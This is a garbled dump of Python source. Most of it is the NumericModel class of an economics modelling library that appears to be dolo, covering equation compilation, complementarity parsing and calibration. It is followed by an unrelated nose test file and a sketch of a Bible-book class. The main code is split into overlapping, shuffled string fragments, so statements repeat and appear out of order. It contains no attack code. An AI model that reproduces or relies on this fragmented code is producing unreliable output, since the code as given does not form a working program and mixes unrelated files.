"self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname))", "else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)]", ".codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from", "\"Complementarity condition '{}' incorrect. 
Expected {} instead of {}.\".format(comp, control, res[1]) raise Exception(msg)", "= timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v)", "pnames = (pname,) + args return self.get_calibration(pnames) group = [g for g in", "eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control =", "Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps", "else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in", "__update_from_symbolic__(self): import numpy # updates calibration according to the symbolic definitions system =", "res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist):", "None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import", "res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res =", "str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k", "funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] =", "eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss +=", "ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So", "# should match self.symbols comps = [] functions = {} original_functions = {}", "eqs = [str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]])", "val = res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val)", "return eq eqs = [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs", "definitions=ddefs, ) # print(\"So far so good !\")c n_output = len(eqs) original_functions[funname] =", "comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf'])", "= \"Complementarity condition '{}' incorrect. 
Expected {} instead of {}.\".format(comp, control, res[1]) raise", "- \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity", "= None covariances = None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None):", "fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far", "evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is", "tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return [ self.get_calibration(p)", "not None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type']", "None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname,", "= upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as", "recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if not spec.get('optional'): raise", "a is a controls - \"expr<=a\" where a is a control - \"expr1<=a<=expr2\"", "[str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name", "v = self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise exception if", "calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator", "ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound =", "unknown symbol ? 
if len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue})", "in eq: lhs, rhs = str.split(eq,'=') eq = '{} - ( {} )'.format(rhs,", "# else ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self):", "comp_args = comp_spec['left-right'] comps = [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]):", "'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None):", "parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r in res] if res[1]", "ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols,", "{} self.infos = infos if infos is not None else {} self.infos['data_layout'] =", "# for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup]", "u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s +=", "'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names =", "tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k)", "s def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb", "regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for", "def decode_complementarity(comp, control): ''' # comp can be either: - None - \"a<=expr\"", "in arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun", "OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import", "timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v =", "elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self,", "from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict,", "residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula", ": {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss # import pprint", "pprint # s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s", "False: target_spec = None else: target_spec[2] = 'out' else: target_spec = None if", "auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd =", "in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in", "ddefs = OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries': t =", "[ self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple): return tuple( [", "res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys():", "import solve_triangular_system self.calibration_dict = 
solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib", "object: ------------ - name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss =", "equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand side", "vals=vals, eqs=eq) ss += \"\\n\" s += ss # import pprint # s", "as rhs - lhs def filter_equal(eq): if '=' in eq: lhs, rhs =", "[ self.get_calibration(p) for p in pname ] ) elif len(args)>0: pnames = (pname,)", "StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit class NumericModel: calibration =", "NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition =", "= [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i]", "calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif", "pname ] ) elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group", "calibration according to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system", "[numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list):", "distribution if distribution is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float))", "else: target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite", "[] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq,", "funname not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain equations", "if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle']", "options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for", "if spec.get('target'): # keep only right-hand side # TODO: restore recursive definitions eqs", "standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__", "self.get_calibration(pnames) group = [g for g in self.symbols.keys() if pname in self.symbols[g]] try:", "{} original_functions = {} original_gufunctions = {} for funname in recipe['specs'].keys(): spec =", "None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables", "self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub =", "import standard_function defs = self.symbolic.definitions # works for fg models only model_type =", "k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options = options if", "gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so", "= standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun 
self.__original_functions__ = original_functions", "to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import", "return [fun_lb, fun_ub] else: return None def residuals(self, calib=None): if self.model_type == 'dtcscc':", "self.variables, time) k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp)", "symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system", "else: continue if spec.get('target'): # keep only right-hand side # TODO: restore recursive", "except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r", "= standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]]", "= recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries':", "eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val", "None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols", ") elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames) group = [g", "fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag", "funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if not", "standard_function defs = self.symbolic.definitions # works for fg models only model_type = self.model_type", "re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be either:", "str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq) return", "= None calibration_dict = None covariances = None markov_chain = None def __init__(self,", "in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs =", "comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs", "raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r in", ".function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit class", "for tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return [", "dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs", "= self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd = OrderedDict() for", "# s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def", "class NumericModel: calibration = None calibration_dict = None covariances = None markov_chain =", "dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return", "eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), 
vals=vals, eqs=eq) ss", "= comp_spec['left-right'] comps = [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if", "for time in [-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs, rhs", "compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]]", "evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution)", "group = [g for g in self.symbols.keys() if pname in self.symbols[g]] try: group", "str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs)", "is not None else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type =", "= distribution if distribution is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances,", "'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} :", "fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions", "target_spec = None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities')", "discrete_transition if markov_chain is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float))", "ag in arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun,", "{} )'.format(rhs, lhs) eq = str.strip(eq) return eq else: return eq eqs =", "gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs)", "symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k not in", "= evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: self.covariances", "is a controls - \"expr<=a\" where a is a control - \"expr1<=a<=expr2\" '''", "model doesn't contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep", "in eqs] eqs = [str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output", "zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict()", "recipes[model_type] symbols = self.symbols # should match self.symbols comps = [] functions =", "rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value", "of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand side #", "= original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\")", "spec.get('recursive') is False: target_spec = None else: target_spec[2] = 'out' else: target_spec =", "for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss", "['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = 
['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args:", "import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be", "is False: target_spec = None else: target_spec[2] = 'out' else: target_spec = None", "eqs = [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for eq in", "a is a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise", ").body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k =", "else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args):", "comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)]", "recipe['specs'][funname] if funname not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't", "TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in", "where a is a controls - \"expr<=a\" where a is a control -", "- type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals()", "njit class NumericModel: calibration = None calibration_dict = None covariances = None markov_chain", "numba import njit class NumericModel: calibration = None calibration_dict = None covariances =", "ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, )", "+= ss # import pprint # s += '- residuals:\\n' # s +=", "in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup)", "# print(\"So far so good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname]", "not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain equations of", "= comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs = [] for i,eq", "from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit", "colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals}", "None covariances = None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic", "= self.symbolic.definitions # works for fg models only model_type = self.model_type if 'auxiliaries'", "eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals,", "p in pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p", "= dd recipe = recipes[model_type] symbols = self.symbols # should match self.symbols comps", "enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs,", "self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args): if", "CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure", "= to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols # should", "self.infos['name'] self.model_type = 
self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy #", "'{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red') # eq = eq.replace('|',", "for eq in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value", "sum( [tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options", "{} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__()", "spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs = []", "eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive')", "pname in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i", "eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control)", "n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output )", "for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in", "in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if", "= regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip()", "StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type]", "in self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs", "self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates", "= StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols =", "covariances = distribution if distribution is None: self.covariances = None else: self.covariances =", "not in ('parameters','shocks','values')], ()) self.options = options if options is not None else", "import ast from collections import OrderedDict from .codegen import to_source from .function_compiler_ast import", "import colored s = u''' Model object: ------------ - name: \"{name}\" - type:", "self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p)", "rhs - lhs def filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=')", "list): return [ self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple): return" ]
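
# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the dolo module above). It shows, in a
# self-contained way, the two small text transformations the compiler applies
# to each equation: rewriting "lhs = rhs" as "rhs - ( lhs )" (mirroring
# filter_equal) and splitting a complementarity condition with the same regex
# used by decode_complementarity(). The sample equation 'y = c + i' and the
# condition '0 <= n <= 1' are made-up inputs for the demo.

import re as _re_demo

def _rewrite_as_residual(eq):
    # An equation becomes an expression whose root is zero at a solution.
    if '=' in eq:
        lhs, rhs = str.split(eq, '=')
        return str.strip('{} - ( {} )'.format(rhs, lhs))
    return eq

_demo_regex = _re_demo.compile("(.*)<=(.*)<=(.*)")

if __name__ == '__main__':
    print(_rewrite_as_residual('y = c + i'))  # -> 'c + i - ( y )'
    bounds = [s.strip() for s in _demo_regex.match('0 <= n <= 1').groups()]
    print(bounds)  # -> ['0', 'n', '1']: lower bound, control name, upper bound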
[ "= Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\",", "nose.tools import * from bmc.book import Book def setup(): print (\"SETUP!\") def teardown():", "def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\",", "DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small():", "\"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should", "matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\",", "def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook():", "print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def", "Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22)", "(\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\")", "from nose.tools import * from bmc.book import Book def setup(): print (\"SETUP!\") def", "import * from bmc.book import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR", "print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name,", "B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B =", "<reponame>reich6534/SumoPY<filename>tests/bmc_test.py from nose.tools import * from bmc.book import Book def setup(): print (\"SETUP!\")", "B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError) def test_smallbook(): Book(\"Obadiah\",", "def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises", "fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError)", "* from bmc.book import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\")", "test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B", "from bmc.book import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def", "Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError) def", "= Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError)", "@raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def", "(IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def", "\"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError) def test_smallbook(): Book(\"Obadiah\", 0)", "27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) 
B.set_chapter_descr(0, \"This", "B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This", "should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\")", "test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\",", "Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew =", "22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151) @raises(ValueError) def test_smallbook():", "def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big():", "50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError) def test_big(): B = Book(\"Revelation\", 22) B.set_chapter_descr(23,", "import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew", "bmc.book import Book def setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname():", "Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0,", "= Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50)", "assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should", "\"Matthew\") @raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\")", "@raises (IndexError) def test_small(): B = Book(\"Genesis\", 50) B.set_chapter_descr(0, \"This should fail\") @raises(IndexError)", "setup(): print (\"SETUP!\") def teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27)", "test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B =", "def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError) def test_small(): B", "teardown(): print(\"TEAR DOWN!\") def test_bookname(): matthew = Book(\"Matthew\", 27) assert_equal(matthew.name, \"Matthew\") @raises (IndexError)", "B = Book(\"Revelation\", 22) B.set_chapter_descr(23, \"This should fail\") @raises(ValueError) def test_bigbook(): Book(\"Exodus\", 151)" ]
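
# ---------------------------------------------------------------------------
# Hypothetical sketch: bmc/book.py is not included here, so this minimal Book
# class is inferred from the tests above. The class and method names come from
# the tests; the 150-chapter upper bound and the 1-based chapter numbering are
# assumptions chosen so that every test above would pass.

class Book(object):

    MAX_CHAPTERS = 150  # assumed: Book("Exodus", 151) must raise ValueError

    def __init__(self, name, chapters):
        # A book must have at least one chapter and at most MAX_CHAPTERS.
        if not 1 <= chapters <= self.MAX_CHAPTERS:
            raise ValueError("invalid chapter count: {}".format(chapters))
        self.name = name
        self.chapters = chapters
        self._descriptions = {}

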